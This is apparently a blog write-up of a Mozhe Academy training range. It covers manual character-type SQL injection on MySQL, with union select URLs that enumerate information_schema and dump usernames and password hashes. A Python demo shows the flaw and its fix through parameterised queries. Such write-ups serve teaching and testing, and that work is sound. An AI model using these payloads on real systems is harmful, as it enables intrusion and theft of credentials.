Mozhe Academy practice range - SQL injection - manual injection vulnerability test (MySQL database - character type)

Background knowledge

1. MySQL data structure

MySQL ships with a database named information_schema that stores metadata about every other database on the server.

In its tables table, the TABLE_SCHEMA field holds the database (library) name and the TABLE_NAME field holds the table name;

in its columns table, the TABLE_SCHEMA field holds the database the table belongs to, TABLE_NAME holds the table name, and COLUMN_NAME holds the column name.

2. Manual injection method

Check whether there is a filter and whether it can be bypassed.

Check whether the page content or the response time changes when the parameter is altered; this decides whether an injection point exists.

Determine the injection type, character or numeric; a character-type point requires closing the surrounding quote.

Determine the number of columns with order by.

After finding the injection point, confirm which fields are displayed through union, then read the current database name and user name, then look up that database (TABLE_SCHEMA) in information_schema to list its tables (table_name), and finally look up which columns the target table has.

3. md5 encryption and decryption.

Thinking

1. Determine whether there is an injection point. Character type, closed with a single quote (').

Appending a single quote (') changes the page.

http://219.153.49.228:41974/new_list.php?id=tingjigonggao' and '1'='1   page normal

2. Determine the number of columns with order by

http://219.153.49.228:41974/new_list.php?id=tingjigonggao' order by 5 --+   page error

http://219.153.49.228:41974/new_list.php?id=tingjigonggao' order by 4 --+   page returns to normal, which shows there are four columns


3. Determine the display positions, the database name and the user name

http://219.153.49.228:41974/new_list.php?id=' union select 1,2,3,4 --+   or   http://219.153.49.228:41974/new_list.php?id=' union select '1','2','3','4

http://219.153.49.228:41974/new_list.php?id=' union select '1',database(),user(),'4   to read the database name and the user name

4. Query the table names in the database

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+

5. Query the column names of the table

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='stormgroup_member'--+

6. Query the values of those columns

http://219.153.49.228:40812/new_list.php?id=' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+
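Added example (not the range's own code): a SQLite stand-in for new_list.php that shows why the closing quote and the --+ comment make the order by and union probes above behave as described, and why the same parameter bound through a parameterised query does nothing. The news table, its column names and its row are constructed for the demo.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed stand-in for the table behind new_list.php (not the range's real schema).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id TEXT, title TEXT, body TEXT, pubdate TEXT)")
    conn.execute("INSERT INTO news VALUES ('tingjigonggao', 'Notice', 'Service downtime notice', '2019-12-12')")
    return conn

def id_from_query_string(qs: str) -> str:
    # Decoded like PHP's $_GET: '+' becomes a space, so a trailing '--+' arrives as '-- '.
    return parse_qs(qs, keep_blank_values=True).get("id", [""])[0]

def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Character-type injection point: the value is pasted between single quotes, so a
    # leading quote closes the literal and the '--' comment swallows the trailing quote.
    sql = f"SELECT id, title, body, pubdate FROM news WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()

def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Parameterised query: the whole value is bound as one string literal, quotes included.
    return conn.execute("SELECT id, title, body, pubdate FROM news WHERE id = ?", (user_id,)).fetchall()

def query_succeeds(conn: sqlite3.Connection, user_id: str) -> bool:
    # "page error" vs "page normal" in the write-up maps to whether the statement runs at all.
    try:
        vulnerable_lookup(conn, user_id)
        return True
    except sqlite3.OperationalError:
        return False

def demo() -> dict:
    conn = make_db()
    normal = id_from_query_string("id=tingjigonggao")
    union_probe = id_from_query_string("id=' union select 1,2,3,4 --+")
    return {
        "vuln_normal": vulnerable_lookup(conn, normal),
        "vuln_union": vulnerable_lookup(conn, union_probe),   # [(1, 2, 3, 4)]: attacker-chosen row
        "safe_union": safe_lookup(conn, union_probe),         # []: payload is just an unmatched id
        "order_by_4": query_succeeds(conn, id_from_query_string("id=tingjigonggao' order by 4 --+")),
        "order_by_5": query_succeeds(conn, id_from_query_string("id=tingjigonggao' order by 5 --+")),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The order by 5 probe fails because the statement has only four result columns, which is exactly the signal the write-up reads from the error page; binding the parameter removes the whole class of behaviour rather than filtering individual keywords.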


Origin www.cnblogs.com/xiaomeng2333/p/12028575.html